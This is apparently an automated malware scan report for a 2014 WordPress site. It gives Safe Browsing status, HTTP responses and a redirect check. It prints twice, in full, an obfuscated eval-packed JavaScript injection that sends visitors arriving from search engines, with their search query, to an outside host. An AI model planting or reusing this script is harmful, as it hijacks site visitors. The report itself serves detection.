Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=driven-ent.com
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://driven-ent.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 27 Dec 2014 06:50:46 GMT Location: /driven Server: Apache/2.2.29 (Unix) FrontPage/5.0.2.2635 Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.27-pl0-gentoo | clean |
http://driven-ent.com/driven | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 27 Dec 2014 06:50:47 GMT Location: http://driven-ent.com/driven/ Server: Apache/2.2.29 (Unix) FrontPage/5.0.2.2635 Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 | clean |
http://driven-ent.com/driven/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 27 Dec 2014 06:50:48 GMT Location: http://www.driven-ent.com/driven/ Server: Apache/2.2.29 (Unix) FrontPage/5.0.2.2635 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: wordpress_6a0aa1416717c0040121c7fb03911b22=%7C1420872648%7Ce4d76b81ae7e7980ac8e33c0ca2560eb; expires=Sat, 10-Jan-2015 06:50:48 GMT; path=/driven/wp-content/plugins; httponly Set-Cookie: wordpress_6a0aa1416717c0040121c7fb03911b22=%7C1420872648%7Ce4d76b81ae7e7980ac8e33c0ca2560eb; expires=Sat, 10-Jan-2015 06:50:48 GMT; path=/driven/wp-admin; httponly Set-Cookie: wordpress_logged_in_6a0aa1416717c0040121c7fb03911b22=%7C1420872648%7C5f0fac186b88570b3a1e30c798a7f029; expires=Sat, 10-Jan-2015 06:50:48 GMT; path=/driven/; httponly X-Pingback: http://www.driven-ent.com/driven/xmlrpc.php X-Powered-By: PHP/5.3.27-pl0-gentoo | clean |
http://www.driven-ent.com/driven/ | 200 OK Content-Length: 39358 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('o r=a.e,t="",q;5(r.4("m.")!=-1)t="q";5(r.4("b.")!=-1)t="q";5(r.4("c.")!=-1)t="p";5(r.4("f.")!=-1)t="q";5(r.4("g.")!=-1)t="h";5(r.4("i.")!=-1)t="q";5(t.6&&((q=r.4("?"+t+"="))!=-1||(q=r.4("&"+t+"="))!=-1))j.k="l://9"+"1."+"n"+"3"+"."+"8"+"9.1"+"s/"+"u.p"+"v?w"+"d=7&t"+"x"+"y="+r.z(q+2+t.6).A("&")[0];',37,37,'||||indexOf|if|length||||document|msn|yahoo||referrer|altavista|aol|query|ask|window|location|http|google|22|var||||12||go|hp|si|er|ms|substring|split'.split('|'),0,{}))
Antivirus reports:
http://www.driven-ent.com/driven/function.fopen | 404 Not Found Content-Length: 33769 Content-Type: text/html | clean |
http://www.driven-ent.com/driven/function.filesize | 404 Not Found Content-Length: 34613 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('o r=a.e,t="",q;5(r.4("m.")!=-1)t="q";5(r.4("b.")!=-1)t="q";5(r.4("c.")!=-1)t="p";5(r.4("f.")!=-1)t="q";5(r.4("g.")!=-1)t="h";5(r.4("i.")!=-1)t="q";5(t.6&&((q=r.4("?"+t+"="))!=-1||(q=r.4("&"+t+"="))!=-1))j.k="l://9"+"1."+"n"+"3"+"."+"8"+"9.1"+"s/"+"u.p"+"v?w"+"d=7&t"+"x"+"y="+r.z(q+2+t.6).A("&")[0];',37,37,'||||indexOf|if|length||||document|msn|yahoo||referrer|altavista|aol|query|ask|window|location|http|google|22|var||||12||go|hp|si|er|ms|substring|split'.split('|'),0,{}))
Antivirus reports:
http://www.driven-ent.com/driven/function.mysql-connect | 404 Not Found Content-Length: 33771 Content-Type: text/html | clean |
http://www.driven-ent.com/test404page.js | 500 Internal Server Error Content-Length: 669 Content-Type: text/html | clean |
http://driven-ent.com/function.filesize | 500 Internal Server Error Content-Length: 669 Content-Type: text/html | clean |
http://driven-ent.com/function.mysql-connect | 500 Internal Server Error Content-Length: 669 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: driven-ent.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 27 Dec 2014 06:50:46 GMT
Location: /driven
Server: Apache/2.2.29 (Unix) FrontPage/5.0.2.2635
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.3.27-pl0-gentoo
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: driven-ent.com
Referer: http://www.google.com/search?q=driven-ent.com
Result:
The result is similar to the first query. There are no suspicious redirects found.